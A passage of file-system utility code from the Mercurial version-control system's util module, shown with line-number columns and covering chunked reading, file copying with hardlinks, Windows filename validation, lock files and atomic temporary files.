1494 1516 '''return no less than min bytes per chunk while data remains,
1495 1517 doubling min after each chunk until it reaches max'''
1496 1518 def log2(x):
1497 1519 if not x:
1498 1520 return 0
1499 1521 i = 0
1500 1522 while x:
1501 1523 x >>= 1
1502 1524 i += 1
1503 1525 return i - 1
1504 1526
1505 1527 buf = []
1506 1528 blen = 0
1507 1529 for chunk in source:
1508 1530 buf.append(chunk)
1509 1531 blen += len(chunk)
1510 1532 if blen >= min:
1511 1533 if min < max:
1512 1534 min = min << 1
1513 1535 nmin = 1 << log2(blen)
1514 1536 if nmin > min:
1515 1537 min = nmin
1516 1538 if min > max:
1517 1539 min = max
1518 1540 yield ''.join(buf)
1519 1541 blen = 0
1520 1542 buf = []
1521 1543 if buf:
1522 1544 yield ''.join(buf)
1523 1545
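# For example (illustrative): feeding many 512-byte chunks through
# increasingchunks() yields joined chunks of roughly 1k, 2k, 4k, ...
# capped at the 64k maximum:
#
#   for chunk in increasingchunks(iter([b'x' * 512] * 1000)):
#       write(chunk)   # hypothetical consumer
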
1524 1546 def always(fn):
1525 1547 return True
1526 1548
1527 1549 def never(fn):
1528 1550 return False
1529 1551
1530 1552 def nogc(func):
1531 1553 """disable garbage collector
1532 1554
1533 1555 Python's garbage collector triggers a GC each time a certain number of
1534 1556 container objects (the number being defined by gc.get_threshold()) are
1535 1557 allocated even when marked not to be tracked by the collector. Tracking has
1536 1558 no effect on when GCs are triggered, only on what objects the GC looks
1537 1559 into. As a workaround, disable GC while building complex (huge)
1538 1560 containers.
1539 1561
1540 1562 This garbage collector issue has been fixed in 2.7. But it still affects
1541 1563 CPython's performance.
1542 1564 """
1543 1565 def wrapper(*args, **kwargs):
1544 1566 gcenabled = gc.isenabled()
1545 1567 gc.disable()
1546 1568 try:
1547 1569 return func(*args, **kwargs)
1548 1570 finally:
1549 1571 if gcenabled:
1550 1572 gc.enable()
1551 1573 return wrapper
1552 1574
1553 1575 if pycompat.ispypy:
1554 1576 # PyPy runs slower with gc disabled
1555 1577 nogc = lambda x: x
1556 1578
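# Typical use (illustrative; the function is made up): decorate a
# function that builds a large container so CPython's collector doesn't
# repeatedly scan it mid-build.
#
#   @nogc
#   def buildhugemap(items):
#       return dict(items)
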
1557 1579 def pathto(root, n1, n2):
1558 1580 '''return the relative path from one place to another.
1559 1581 root should use os.sep to separate directories
1560 1582 n1 should use os.sep to separate directories
1561 1583 n2 should use "/" to separate directories
1562 1584 returns an os.sep-separated path.
1563 1585
1564 1586 If n1 is a relative path, it's assumed it's
1565 1587 relative to root.
1566 1588 n2 should always be relative to root.
1567 1589 '''
1568 1590 if not n1:
1569 1591 return localpath(n2)
1570 1592 if os.path.isabs(n1):
1571 1593 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1572 1594 return os.path.join(root, localpath(n2))
1573 1595 n2 = '/'.join((pconvert(root), n2))
1574 1596 a, b = splitpath(n1), n2.split('/')
1575 1597 a.reverse()
1576 1598 b.reverse()
1577 1599 while a and b and a[-1] == b[-1]:
1578 1600 a.pop()
1579 1601 b.pop()
1580 1602 b.reverse()
1581 1603 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1582 1604
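# For example (illustrative, assuming os.sep == '/'):
#
#   pathto(b'/repo', b'a/b', b'a/c') -> b'../c'
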
1583 1605 # the location of data files matching the source code
1584 1606 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1585 1607 # executable version (py2exe) doesn't support __file__
1586 1608 datapath = os.path.dirname(pycompat.sysexecutable)
1587 1609 else:
1588 1610 datapath = os.path.dirname(pycompat.fsencode(__file__))
1589 1611
1590 1612 i18n.setdatapath(datapath)
1591 1613
1592 1614 def checksignature(func):
1593 1615 '''wrap a function with code to check for calling errors'''
1594 1616 def check(*args, **kwargs):
1595 1617 try:
1596 1618 return func(*args, **kwargs)
1597 1619 except TypeError:
1598 1620 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1599 1621 raise error.SignatureError
1600 1622 raise
1601 1623
1602 1624 return check
1603 1625
1604 1626 # a whitelist of known filesystems where hardlink works reliably
1605 1627 _hardlinkfswhitelist = {
1606 1628 'apfs',
1607 1629 'btrfs',
1608 1630 'ext2',
1609 1631 'ext3',
1610 1632 'ext4',
1611 1633 'hfs',
1612 1634 'jfs',
1613 1635 'NTFS',
1614 1636 'reiserfs',
1615 1637 'tmpfs',
1616 1638 'ufs',
1617 1639 'xfs',
1618 1640 'zfs',
1619 1641 }
1620 1642
1621 1643 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1622 1644 '''copy a file, preserving mode and optionally other stat info like
1623 1645 atime/mtime
1624 1646
1625 1647 checkambig argument is used with filestat, and is useful only if
1626 1648 destination file is guarded by any lock (e.g. repo.lock or
1627 1649 repo.wlock).
1628 1650
1629 1651 copystat and checkambig should be exclusive.
1630 1652 '''
1631 1653 assert not (copystat and checkambig)
1632 1654 oldstat = None
1633 1655 if os.path.lexists(dest):
1634 1656 if checkambig:
1635 1657 oldstat = checkambig and filestat.frompath(dest)
1636 1658 unlink(dest)
1637 1659 if hardlink:
1638 1660 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1639 1661 # unless we are confident that dest is on a whitelisted filesystem.
1640 1662 try:
1641 1663 fstype = getfstype(os.path.dirname(dest))
1642 1664 except OSError:
1643 1665 fstype = None
1644 1666 if fstype not in _hardlinkfswhitelist:
1645 1667 hardlink = False
1646 1668 if hardlink:
1647 1669 try:
1648 1670 oslink(src, dest)
1649 1671 return
1650 1672 except (IOError, OSError):
1651 1673 pass # fall back to normal copy
1652 1674 if os.path.islink(src):
1653 1675 os.symlink(os.readlink(src), dest)
1654 1676 # copystat is ignored for symlinks, but in general copying times isn't
1655 1677 # needed for them anyway
1656 1678 else:
1657 1679 try:
1658 1680 shutil.copyfile(src, dest)
1659 1681 if copystat:
1660 1682 # copystat also copies mode
1661 1683 shutil.copystat(src, dest)
1662 1684 else:
1663 1685 shutil.copymode(src, dest)
1664 1686 if oldstat and oldstat.stat:
1665 1687 newstat = filestat.frompath(dest)
1666 1688 if newstat.isambig(oldstat):
1667 1689 # stat of copied file is ambiguous to original one
1668 1690 advanced = (
1669 1691 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1670 1692 os.utime(dest, (advanced, advanced))
1671 1693 except shutil.Error as inst:
1672 1694 raise error.Abort(str(inst))
1673 1695
1674 1696 def copyfiles(src, dst, hardlink=None, progress=None):
1675 1697 """Copy a directory tree using hardlinks if possible."""
1676 1698 num = 0
1677 1699
1678 1700 def settopic():
1679 1701 if progress:
1680 1702 progress.topic = _('linking') if hardlink else _('copying')
1681 1703
1682 1704 if os.path.isdir(src):
1683 1705 if hardlink is None:
1684 1706 hardlink = (os.stat(src).st_dev ==
1685 1707 os.stat(os.path.dirname(dst)).st_dev)
1686 1708 settopic()
1687 1709 os.mkdir(dst)
1688 1710 for name, kind in listdir(src):
1689 1711 srcname = os.path.join(src, name)
1690 1712 dstname = os.path.join(dst, name)
1691 1713 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1692 1714 num += n
1693 1715 else:
1694 1716 if hardlink is None:
1695 1717 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1696 1718 os.stat(os.path.dirname(dst)).st_dev)
1697 1719 settopic()
1698 1720
1699 1721 if hardlink:
1700 1722 try:
1701 1723 oslink(src, dst)
1702 1724 except (IOError, OSError):
1703 1725 hardlink = False
1704 1726 shutil.copy(src, dst)
1705 1727 else:
1706 1728 shutil.copy(src, dst)
1707 1729 num += 1
1708 1730 if progress:
1709 1731 progress.increment()
1710 1732
1711 1733 return hardlink, num
1712 1734
1713 1735 _winreservednames = {
1714 1736 'con', 'prn', 'aux', 'nul',
1715 1737 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1716 1738 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1717 1739 }
1718 1740 _winreservedchars = ':*?"<>|'
1719 1741 def checkwinfilename(path):
1720 1742 r'''Check that the base-relative path is a valid filename on Windows.
1721 1743 Returns None if the path is ok, or a UI string describing the problem.
1722 1744
1723 1745 >>> checkwinfilename(b"just/a/normal/path")
1724 1746 >>> checkwinfilename(b"foo/bar/con.xml")
1725 1747 "filename contains 'con', which is reserved on Windows"
1726 1748 >>> checkwinfilename(b"foo/con.xml/bar")
1727 1749 "filename contains 'con', which is reserved on Windows"
1728 1750 >>> checkwinfilename(b"foo/bar/xml.con")
1729 1751 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1730 1752 "filename contains 'AUX', which is reserved on Windows"
1731 1753 >>> checkwinfilename(b"foo/bar/bla:.txt")
1732 1754 "filename contains ':', which is reserved on Windows"
1733 1755 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1734 1756 "filename contains '\\x07', which is invalid on Windows"
1735 1757 >>> checkwinfilename(b"foo/bar/bla ")
1736 1758 "filename ends with ' ', which is not allowed on Windows"
1737 1759 >>> checkwinfilename(b"../bar")
1738 1760 >>> checkwinfilename(b"foo\\")
1739 1761 "filename ends with '\\', which is invalid on Windows"
1740 1762 >>> checkwinfilename(b"foo\\/bar")
1741 1763 "directory name ends with '\\', which is invalid on Windows"
1742 1764 '''
1743 1765 if path.endswith('\\'):
1744 1766 return _("filename ends with '\\', which is invalid on Windows")
1745 1767 if '\\/' in path:
1746 1768 return _("directory name ends with '\\', which is invalid on Windows")
1747 1769 for n in path.replace('\\', '/').split('/'):
1748 1770 if not n:
1749 1771 continue
1750 1772 for c in _filenamebytestr(n):
1751 1773 if c in _winreservedchars:
1752 1774 return _("filename contains '%s', which is reserved "
1753 1775 "on Windows") % c
1754 1776 if ord(c) <= 31:
1755 1777 return _("filename contains '%s', which is invalid "
1756 1778 "on Windows") % stringutil.escapestr(c)
1757 1779 base = n.split('.')[0]
1758 1780 if base and base.lower() in _winreservednames:
1759 1781 return _("filename contains '%s', which is reserved "
1760 1782 "on Windows") % base
1761 1783 t = n[-1:]
1762 1784 if t in '. ' and n not in '..':
1763 1785 return _("filename ends with '%s', which is not allowed "
1764 1786 "on Windows") % t
1765 1787
1766 1788 if pycompat.iswindows:
1767 1789 checkosfilename = checkwinfilename
1768 1790 timer = time.clock
1769 1791 else:
1770 1792 checkosfilename = platform.checkosfilename
1771 1793 timer = time.time
1772 1794
1773 1795 if safehasattr(time, "perf_counter"):
1774 1796 timer = time.perf_counter
1775 1797
1776 1798 def makelock(info, pathname):
1777 1799 """Create a lock file atomically if possible
1778 1800
1779 1801 This may leave a stale lock file if symlink isn't supported and signal
1780 1802 interrupt is enabled.
1781 1803 """
1782 1804 try:
1783 1805 return os.symlink(info, pathname)
1784 1806 except OSError as why:
1785 1807 if why.errno == errno.EEXIST:
1786 1808 raise
1787 1809 except AttributeError: # no symlink in os
1788 1810 pass
1789 1811
1790 1812 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1791 1813 ld = os.open(pathname, flags)
1792 1814 os.write(ld, info)
1793 1815 os.close(ld)
1794 1816
1795 1817 def readlock(pathname):
1796 1818 try:
1797 1819 return os.readlink(pathname)
1798 1820 except OSError as why:
1799 1821 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1800 1822 raise
1801 1823 except AttributeError: # no symlink in os
1802 1824 pass
1803 1825 fp = posixfile(pathname, 'rb')
1804 1826 r = fp.read()
1805 1827 fp.close()
1806 1828 return r
1807 1829
1808 1830 def fstat(fp):
1809 1831 '''stat file object that may not have fileno method.'''
1810 1832 try:
1811 1833 return os.fstat(fp.fileno())
1812 1834 except AttributeError:
1813 1835 return os.stat(fp.name)
1814 1836
1815 1837 # File system features
1816 1838
1817 1839 def fscasesensitive(path):
1818 1840 """
1819 1841 Return true if the given path is on a case-sensitive filesystem
1820 1842
1821 1843 Requires a path (like /foo/.hg) ending with a foldable final
1822 1844 directory component.
1823 1845 """
1824 1846 s1 = os.lstat(path)
1825 1847 d, b = os.path.split(path)
1826 1848 b2 = b.upper()
1827 1849 if b == b2:
1828 1850 b2 = b.lower()
1829 1851 if b == b2:
1830 1852 return True # no evidence against case sensitivity
1831 1853 p2 = os.path.join(d, b2)
1832 1854 try:
1833 1855 s2 = os.lstat(p2)
1834 1856 if s2 == s1:
1835 1857 return False
1836 1858 return True
1837 1859 except OSError:
1838 1860 return True
1839 1861
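# For example (illustrative): on a default case-insensitive macOS
# volume, fscasesensitive(b'/path/to/repo/.hg') returns False, while on
# a typical Linux ext4 filesystem it returns True.
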
1840 1862 try:
1841 1863 import re2
1842 1864 _re2 = None
1843 1865 except ImportError:
1844 1866 _re2 = False
1845 1867
1846 1868 class _re(object):
1847 1869 def _checkre2(self):
1848 1870 global _re2
1849 1871 try:
1850 1872 # check if match works, see issue3964
1851 1873 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1852 1874 except ImportError:
1853 1875 _re2 = False
1854 1876
1855 1877 def compile(self, pat, flags=0):
1856 1878 '''Compile a regular expression, using re2 if possible
1857 1879
1858 1880 For best performance, use only re2-compatible regexp features. The
1859 1881 only flags from the re module that are re2-compatible are
1860 1882 IGNORECASE and MULTILINE.'''
1861 1883 if _re2 is None:
1862 1884 self._checkre2()
1863 1885 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1864 1886 if flags & remod.IGNORECASE:
1865 1887 pat = '(?i)' + pat
1866 1888 if flags & remod.MULTILINE:
1867 1889 pat = '(?m)' + pat
1868 1890 try:
1869 1891 return re2.compile(pat)
1870 1892 except re2.error:
1871 1893 pass
1872 1894 return remod.compile(pat, flags)
1873 1895
1874 1896 @propertycache
1875 1897 def escape(self):
1876 1898 '''Return the version of escape corresponding to self.compile.
1877 1899
1878 1900 This is imperfect because whether re2 or re is used for a particular
1879 1901 function depends on the flags, etc, but it's the best we can do.
1880 1902 '''
1881 1903 global _re2
1882 1904 if _re2 is None:
1883 1905 self._checkre2()
1884 1906 if _re2:
1885 1907 return re2.escape
1886 1908 else:
1887 1909 return remod.escape
1888 1910
1889 1911 re = _re()
1890 1912
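# Illustrative use of the re2-aware compiler (the pattern is made up);
# it transparently falls back to the stdlib re module when re2 is
# unavailable or the flags aren't re2-compatible:
#
#   pat = re.compile(br'^[0-9a-f]{40}$', remod.IGNORECASE)
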
1891 1913 _fspathcache = {}
1892 1914 def fspath(name, root):
1893 1915 '''Get name in the case stored in the filesystem
1894 1916
1895 1917 The name should be relative to root, and be normcase-ed for efficiency.
1896 1918
1897 1919 Note that this function is unnecessary, and should not be
1898 1920 called, for case-sensitive filesystems (simply because it's expensive).
1899 1921
1900 1922 The root should be normcase-ed, too.
1901 1923 '''
1902 1924 def _makefspathcacheentry(dir):
1903 1925 return dict((normcase(n), n) for n in os.listdir(dir))
1904 1926
1905 1927 seps = pycompat.ossep
1906 1928 if pycompat.osaltsep:
1907 1929 seps = seps + pycompat.osaltsep
1908 1930 # Protect backslashes. This gets silly very quickly.
1909 1931 seps = seps.replace('\\', '\\\\')
1910 1932 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1911 1933 dir = os.path.normpath(root)
1912 1934 result = []
1913 1935 for part, sep in pattern.findall(name):
1914 1936 if sep:
1915 1937 result.append(sep)
1916 1938 continue
1917 1939
1918 1940 if dir not in _fspathcache:
1919 1941 _fspathcache[dir] = _makefspathcacheentry(dir)
1920 1942 contents = _fspathcache[dir]
1921 1943
1922 1944 found = contents.get(part)
1923 1945 if not found:
1924 1946 # retry "once per directory" per "dirstate.walk" which
1925 1947 # may take place for each patch of "hg qpush", for example
1926 1948 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1927 1949 found = contents.get(part)
1928 1950
1929 1951 result.append(found or part)
1930 1952 dir = os.path.join(dir, part)
1931 1953
1932 1954 return ''.join(result)
1933 1955
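# For example (illustrative): on a case-insensitive filesystem where the
# directory is stored as b'Foo' and the file as b'README.txt',
# fspath(b'foo/readme.txt', root) would return b'Foo/README.txt'.
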
1934 1956 def checknlink(testfile):
1935 1957 '''check whether hardlink count reporting works properly'''
1936 1958
1937 1959 # testfile may be open, so we need a separate file for checking to
1938 1960 # work around issue2543 (or testfile may get lost on Samba shares)
1939 1961 f1, f2, fp = None, None, None
1940 1962 try:
1941 1963 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1942 1964 suffix='1~', dir=os.path.dirname(testfile))
1943 1965 os.close(fd)
1944 1966 f2 = '%s2~' % f1[:-2]
1945 1967
1946 1968 oslink(f1, f2)
1947 1969 # nlinks() may behave differently for files on Windows shares if
1948 1970 # the file is open.
1949 1971 fp = posixfile(f2)
1950 1972 return nlinks(f2) > 1
1951 1973 except OSError:
1952 1974 return False
1953 1975 finally:
1954 1976 if fp is not None:
1955 1977 fp.close()
1956 1978 for f in (f1, f2):
1957 1979 try:
1958 1980 if f is not None:
1959 1981 os.unlink(f)
1960 1982 except OSError:
1961 1983 pass
1962 1984
1963 1985 def endswithsep(path):
1964 1986 '''Check path ends with os.sep or os.altsep.'''
1965 1987 return (path.endswith(pycompat.ossep)
1966 1988 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1967 1989
1968 1990 def splitpath(path):
1969 1991 '''Split path by os.sep.
1970 1992 Note that this function does not use os.altsep because this is
1971 1993 an alternative of simple "xxx.split(os.sep)".
1972 1994 It is recommended to use os.path.normpath() before using this
1973 1995 function if needed.'''
1974 1996 return path.split(pycompat.ossep)
1975 1997
1976 1998 def mktempcopy(name, emptyok=False, createmode=None):
1977 1999 """Create a temporary file with the same contents from name
1978 2000
1979 2001 The permission bits are copied from the original file.
1980 2002
1981 2003 If the temporary file is going to be truncated immediately, you
1982 2004 can use emptyok=True as an optimization.
1983 2005
1984 2006 Returns the name of the temporary file.
1985 2007 """
1986 2008 d, fn = os.path.split(name)
1987 2009 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1988 2010 os.close(fd)
1989 2011 # Temporary files are created with mode 0600, which is usually not
1990 2012 # what we want. If the original file already exists, just copy
1991 2013 # its mode. Otherwise, manually obey umask.
1992 2014 copymode(name, temp, createmode)
1993 2015 if emptyok:
1994 2016 return temp
1995 2017 try:
1996 2018 try:
1997 2019 ifp = posixfile(name, "rb")
1998 2020 except IOError as inst:
1999 2021 if inst.errno == errno.ENOENT:
2000 2022 return temp
2001 2023 if not getattr(inst, 'filename', None):
2002 2024 inst.filename = name
2003 2025 raise
2004 2026 ofp = posixfile(temp, "wb")
2005 2027 for chunk in filechunkiter(ifp):
2006 2028 ofp.write(chunk)
2007 2029 ifp.close()
2008 2030 ofp.close()
2009 2031 except: # re-raises
2010 2032 try:
2011 2033 os.unlink(temp)
2012 2034 except OSError:
2013 2035 pass
2014 2036 raise
2015 2037 return temp
2016 2038
2017 2039 class filestat(object):
2018 2040 """help to exactly detect change of a file
2019 2041
2020 2042 The 'stat' attribute is the result of 'os.stat()' if the specified
2021 2043 'path' exists, and None otherwise. This saves callers a separate
2022 2044 'exists()' check before using this class.
2023 2045 """
2024 2046 def __init__(self, stat):
2025 2047 self.stat = stat
2026 2048
2027 2049 @classmethod
2028 2050 def frompath(cls, path):
2029 2051 try:
2030 2052 stat = os.stat(path)
2031 2053 except OSError as err:
2032 2054 if err.errno != errno.ENOENT:
2033 2055 raise
2034 2056 stat = None
2035 2057 return cls(stat)
2036 2058
2037 2059 @classmethod
2038 2060 def fromfp(cls, fp):
2039 2061 stat = os.fstat(fp.fileno())
2040 2062 return cls(stat)
2041 2063
2042 2064 __hash__ = object.__hash__
2043 2065
2044 2066 def __eq__(self, old):
2045 2067 try:
2046 2068 # if ambiguity between stat of new and old file is
2047 2069 # avoided, comparison of size, ctime and mtime is enough
2048 2070 # to exactly detect change of a file regardless of platform
2049 2071 return (self.stat.st_size == old.stat.st_size and
2050 2072 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2051 2073 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2052 2074 except AttributeError:
2053 2075 pass
2054 2076 try:
2055 2077 return self.stat is None and old.stat is None
2056 2078 except AttributeError:
2057 2079 return False
2058 2080
2059 2081 def isambig(self, old):
2060 2082 """Examine whether new (= self) stat is ambiguous against old one
2061 2083
2062 2084 "S[N]" below means stat of a file at N-th change:
2063 2085
2064 2086 - S[n-1].ctime < S[n].ctime: can detect change of a file
2065 2087 - S[n-1].ctime == S[n].ctime
2066 2088 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2067 2089 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2068 2090 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2069 2091 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2070 2092
2071 2093 Case (*2) above means that a file was changed twice or more
2072 2094 within the same second (= S[n-1].ctime), so comparing timestamps
2073 2095 is ambiguous.
2074 2096
2075 2097 The basic idea to avoid such ambiguity is "advance mtime by 1 sec
2076 2098 if the timestamp is ambiguous".
2077 2099
2078 2100 But advancing mtime only in case (*2) doesn't work as
2079 2101 expected, because naturally advanced S[n].mtime in case (*1)
2080 2102 might be equal to manually advanced S[n-1 or earlier].mtime.
2081 2103
2082 2104 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2083 2105 treated as ambiguous regardless of mtime, to avoid overlooking
2084 2106 a change due to collisions between such mtimes.
2085 2107
2086 2108 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2087 2109 S[n].mtime", even if size of a file isn't changed.
2088 2110 """
2089 2111 try:
2090 2112 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2091 2113 except AttributeError:
2092 2114 return False
2093 2115
2094 2116 def avoidambig(self, path, old):
2095 2117 """Change file stat of specified path to avoid ambiguity
2096 2118
2097 2119 'old' should be previous filestat of 'path'.
2098 2120
2099 2121 Avoiding ambiguity is skipped if the process doesn't have
2100 2122 appropriate privileges for 'path'; False is returned in that
2101 2123 case.
2102 2124
2103 2125 Otherwise, this returns True, as "ambiguity is avoided".
2104 2126 """
2105 2127 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2106 2128 try:
2107 2129 os.utime(path, (advanced, advanced))
2108 2130 except OSError as inst:
2109 2131 if inst.errno == errno.EPERM:
2110 2132 # utime() on the file created by another user causes EPERM,
2111 2133 # if a process doesn't have appropriate privileges
2112 2134 return False
2113 2135 raise
2114 2136 return True
2115 2137
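# A worked example (illustrative): if a file is written twice within the
# same second, S[n-1].ctime == S[n].ctime, so isambig() is True;
# avoidambig() then bumps mtime to (old mtime + 1) & 0x7fffffff, keeping
# the two states distinguishable by (size, ctime, mtime).
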
2116 2138 def __ne__(self, other):
2117 2139 return not self == other
2118 2140
2119 2141 class atomictempfile(object):
2120 2142 '''writable file object that atomically updates a file
2121 2143
2122 2144 All writes will go to a temporary copy of the original file. Call
2123 2145 close() when you are done writing, and atomictempfile will rename
2124 2146 the temporary copy to the original name, making the changes
2125 2147 visible. If the object is destroyed without being closed, all your
2126 2148 writes are discarded.
2127 2149
2128 2150 checkambig argument of constructor is used with filestat, and is
2129 2151 useful only if target file is guarded by any lock (e.g. repo.lock
2130 2152 or repo.wlock).
2131 2153 '''
2132 2154 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2133 2155 self.__name = name # permanent name
2134 2156 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2135 2157 createmode=createmode)
2136 2158 self._fp = posixfile(self._tempname, mode)
2137 2159 self._checkambig = checkambig
2138 2160
2139 2161 # delegated methods
2140 2162 self.read = self._fp.read
2141 2163 self.write = self._fp.write
2142 2164 self.seek = self._fp.seek
2143 2165 self.tell = self._fp.tell
2144 2166 self.fileno = self._fp.fileno
2145 2167
2146 2168 def close(self):
2147 2169 if not self._fp.closed:
2148 2170 self._fp.close()
2149 2171 filename = localpath(self.__name)
2150 2172 oldstat = self._checkambig and filestat.frompath(filename)
2151 2173 if oldstat and oldstat.stat:
2152 2174 rename(self._tempname, filename)
2153 2175 newstat = filestat.frompath(filename)
2154 2176 if newstat.isambig(oldstat):
2155 2177 # stat of changed file is ambiguous to original one
2156 2178 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2157 2179 os.utime(filename, (advanced, advanced))
2158 2180 else:
2159 2181 rename(self._tempname, filename)
2160 2182
2161 2183 def discard(self):
2162 2184 if not self._fp.closed:
2163 2185 try:
2164 2186 os.unlink(self._tempname)
2165 2187 except OSError:
2166 2188 pass
2167 2189 self._fp.close()
2168 2190
2169 2191 def __del__(self):
2170 2192 if safehasattr(self, '_fp'): # constructor actually did something
2171 2193 self.discard()
2172 2194
2173 2195 def __enter__(self):
2174 2196 return self
2175 2197
2176 2198 def __exit__(self, exctype, excvalue, traceback):
2177 2199 if exctype is not None:
2178 2200 self.discard()
2179 2201 else:
2180 2202 self.close()
2181 2203
2182 2204 def unlinkpath(f, ignoremissing=False, rmdir=True):
2183 2205 """unlink and remove the directory if it is empty"""
2184 2206 if ignoremissing:
2185 2207 tryunlink(f)
2186 2208 else:
2187 2209 unlink(f)
2188 2210 if rmdir:
2189 2211 # try removing directories that might now be empty
2190 2212 try:
2191 2213 removedirs(os.path.dirname(f))
2192 2214 except OSError:
2193 2215 pass
2194 2216
2195 2217 def tryunlink(f):
2196 2218 """Attempt to remove a file, ignoring ENOENT errors."""
2197 2219 try:
2198 2220 unlink(f)
2199 2221 except OSError as e:
2200 2222 if e.errno != errno.ENOENT:
2201 2223 raise
2202 2224
2203 2225 def makedirs(name, mode=None, notindexed=False):
2204 2226 """recursive directory creation with parent mode inheritance
2205 2227
2206 2228 Newly created directories are marked as "not to be indexed by
2207 2229 the content indexing service", if ``notindexed`` is specified
2208 2230 for "write" mode access.
2209 2231 """
2210 2232 try:
2211 2233 makedir(name, notindexed)
2212 2234 except OSError as err:
2213 2235 if err.errno == errno.EEXIST:
2214 2236 return
2215 2237 if err.errno != errno.ENOENT or not name:
2216 2238 raise
2217 2239 parent = os.path.dirname(os.path.abspath(name))
2218 2240 if parent == name:
2219 2241 raise
2220 2242 makedirs(parent, mode, notindexed)
2221 2243 try:
2222 2244 makedir(name, notindexed)
2223 2245 except OSError as err:
2224 2246 # Catch EEXIST to handle races
2225 2247 if err.errno == errno.EEXIST:
2226 2248 return
2227 2249 raise
2228 2250 if mode is not None:
2229 2251 os.chmod(name, mode)
2230 2252
2231 2253 def readfile(path):
2232 2254 with open(path, 'rb') as fp:
2233 2255 return fp.read()
2234 2256
2235 2257 def writefile(path, text):
2236 2258 with open(path, 'wb') as fp:
2237 2259 fp.write(text)
2238 2260
2239 2261 def appendfile(path, text):
2240 2262 with open(path, 'ab') as fp:
2241 2263 fp.write(text)
2242 2264
2243 2265 class chunkbuffer(object):
2244 2266 """Allow arbitrary sized chunks of data to be efficiently read from an
2245 2267 iterator over chunks of arbitrary size."""
2246 2268
2247 2269 def __init__(self, in_iter):
2248 2270 """in_iter is the iterator that's iterating over the input chunks."""
2249 2271 def splitbig(chunks):
2250 2272 for chunk in chunks:
2251 2273 if len(chunk) > 2**20:
2252 2274 pos = 0
2253 2275 while pos < len(chunk):
2254 2276 end = pos + 2 ** 18
2255 2277 yield chunk[pos:end]
2256 2278 pos = end
2257 2279 else:
2258 2280 yield chunk
2259 2281 self.iter = splitbig(in_iter)
2260 2282 self._queue = collections.deque()
2261 2283 self._chunkoffset = 0
2262 2284
2263 2285 def read(self, l=None):
2264 2286 """Read L bytes of data from the iterator of chunks of data.
2265 2287 Returns less than L bytes if the iterator runs dry.
2266 2288
2267 2289 If size parameter is omitted, read everything"""
2268 2290 if l is None:
2269 2291 return ''.join(self.iter)
2270 2292
2271 2293 left = l
2272 2294 buf = []
2273 2295 queue = self._queue
2274 2296 while left > 0:
2275 2297 # refill the queue
2276 2298 if not queue:
2277 2299 target = 2**18
2278 2300 for chunk in self.iter:
2279 2301 queue.append(chunk)
2280 2302 target -= len(chunk)
2281 2303 if target <= 0:
2282 2304 break
2283 2305 if not queue:
2284 2306 break
2285 2307
2286 2308 # The easy way to do this would be to queue.popleft(), modify the
2287 2309 # chunk (if necessary), then queue.appendleft(). However, for cases
2288 2310 # where we read partial chunk content, this incurs 2 dequeue
2289 2311 # mutations and creates a new str for the remaining chunk in the
2290 2312 # queue. Our code below avoids this overhead.
2291 2313
2292 2314 chunk = queue[0]
2293 2315 chunkl = len(chunk)
2294 2316 offset = self._chunkoffset
2295 2317
2296 2318 # Use full chunk.
2297 2319 if offset == 0 and left >= chunkl:
2298 2320 left -= chunkl
2299 2321 queue.popleft()
2300 2322 buf.append(chunk)
2301 2323 # self._chunkoffset remains at 0.
2302 2324 continue
2303 2325
2304 2326 chunkremaining = chunkl - offset
2305 2327
2306 2328 # Use all of unconsumed part of chunk.
2307 2329 if left >= chunkremaining:
2308 2330 left -= chunkremaining
2309 2331 queue.popleft()
2310 2332 # offset == 0 is handled by the block above, so offset is non-zero
2311 2333 # here and this won't merely copy via ``chunk[0:]``.
2312 2334 buf.append(chunk[offset:])
2313 2335 self._chunkoffset = 0
2314 2336
2315 2337 # Partial chunk needed.
2316 2338 else:
2317 2339 buf.append(chunk[offset:offset + left])
2318 2340 self._chunkoffset += left
2319 2341 left -= chunkremaining
2320 2342
2321 2343 return ''.join(buf)
2322 2344
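# Illustrative use: wrap an iterator of variably-sized chunks and read
# fixed-size records from it:
#
#   buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
#   buf.read(4)  -> b'abcd'
#   buf.read(4)  -> b'efgh'
#   buf.read(4)  -> b''
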
2323 2345 def filechunkiter(f, size=131072, limit=None):
2324 2346 """Create a generator that produces the data in the file size
